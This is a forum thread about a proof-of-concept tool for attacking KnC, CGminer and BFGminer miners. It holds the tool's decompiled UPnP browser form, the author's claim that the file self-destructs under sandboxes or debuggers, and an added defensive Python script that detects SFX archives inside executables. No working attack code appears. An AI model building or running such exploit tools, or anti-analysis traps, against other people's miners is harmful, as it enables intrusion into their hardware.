If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, then your intentions are NOT to test your environment, thus the file gets destroyed.

I received a ton of PMs about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

Over and out.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 27/01/2014, 19:26:24 UTC
frmUPnPBrowser:
Code:
Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?

So you can decompile a standard .NET form... Congrats!
Now show me the code that gets executed?? That's what this is about, right?
Why on earth should I encrypt a standard form doing nothing but displaying some results??

I can also just provide you the manifest XML file, instead of acting like a fool that can decompile a standard winform.
Post
Topic
Board Mining
Re: KnC Miner : Security hacked - UPDATE with TOOL
by
steve15
on 27/01/2014, 13:54:14 UTC
The security built in can not be bypassed.
I lol'ed...
Your exe is actually an SFX RAR containing, among others, two other exes: your AutoIt protection(?) and your .NET exe that can be fully decompiled with dotPeek or ILSpy!
For a pentesting expert, you could have done a better job!

Feel free to decompile it, and PM me the results.
We'll compare the source with your results then ;-)
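ici_lemmy's observation that the exe is an SFX RAR wrapping an AutoIt stub and a .NET exe is the first thing to check before running anything: an SFX stub is a normal PE whose archive sits in the overlay, the bytes after the last section's raw data. The Python below is an added example, not ici_lemmy's or steve15's code. It locates the overlay from the PE section table and looks for RAR, 7-Zip and ZIP signatures there; searching only the overlay avoids false hits on ZIP-style resources embedded inside the sections. The sample PE is constructed by build_fake_pe() and is not loadable, just enough header for the parser.

```python
import struct
import sys

# Magic bytes of the archive formats SFX stubs are usually built from.
ARCHIVE_MAGIC = [
    (b"Rar!\x1a\x07\x00", "RAR 4.x archive"),
    (b"Rar!\x1a\x07\x01\x00", "RAR 5 archive"),
    (b"7z\xbc\xaf\x27\x1c", "7-Zip archive"),
    (b"PK\x03\x04", "ZIP local file header"),
]


def overlay_offset(data):
    """Offset of the overlay: the first byte after the last section's raw data.
    An SFX stub stores its archive there. Returns None if `data` is not a PE."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]       # e_lfanew
    if pe + 24 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    sect = pe + 24 + opt_size               # first IMAGE_SECTION_HEADER
    end = sect + 40 * nsections             # at least past the section table
    if end > len(data):
        return None
    for i in range(nsections):
        # SizeOfRawData and PointerToRawData sit at +16 in each 40-byte header
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def find_embedded_archives(data, start=0):
    """(offset, label) for every archive signature at or after `start`."""
    hits = []
    for magic, label in ARCHIVE_MAGIC:
        pos = data.find(magic, start)
        while pos != -1:
            hits.append((pos, label))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def sfx_archive(data):
    """Label of the first archive signature in the overlay, or None."""
    ovl = overlay_offset(data)
    if ovl is None or ovl >= len(data):
        return None
    hits = find_embedded_archives(data, ovl)
    return hits[0][1] if hits else None


def build_fake_pe(section_payload, overlay):
    """Constructed sample: a minimal, non-loadable PE skeleton with one section
    whose raw data is `section_payload`, followed by `overlay`."""
    pe_off = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0: not needed here), Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    raw_ptr = pe_off + 24 + 40              # payload right after the section table
    section = (b".text".ljust(8, b"\0")
               + struct.pack("<IIII", len(section_payload), 0x1000,
                             len(section_payload), raw_ptr)
               + b"\0" * 16)
    return dos + coff + section + section_payload + overlay


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_fake_pe(b"\x90" * 32, b"Rar!\x1a\x07\x00" + b"<archive data>")
    print("overlay at", overlay_offset(data), "archive:", sfx_archive(data))


if __name__ == "__main__":
    main(sys.argv)
```

Pass a real file as the first argument to check it; a hit means the program you were handed is a wrapper, and the contents (here an AutoIt stub plus a .NET exe) can be extracted with the archiver and examined one by one without ever executing the outer exe.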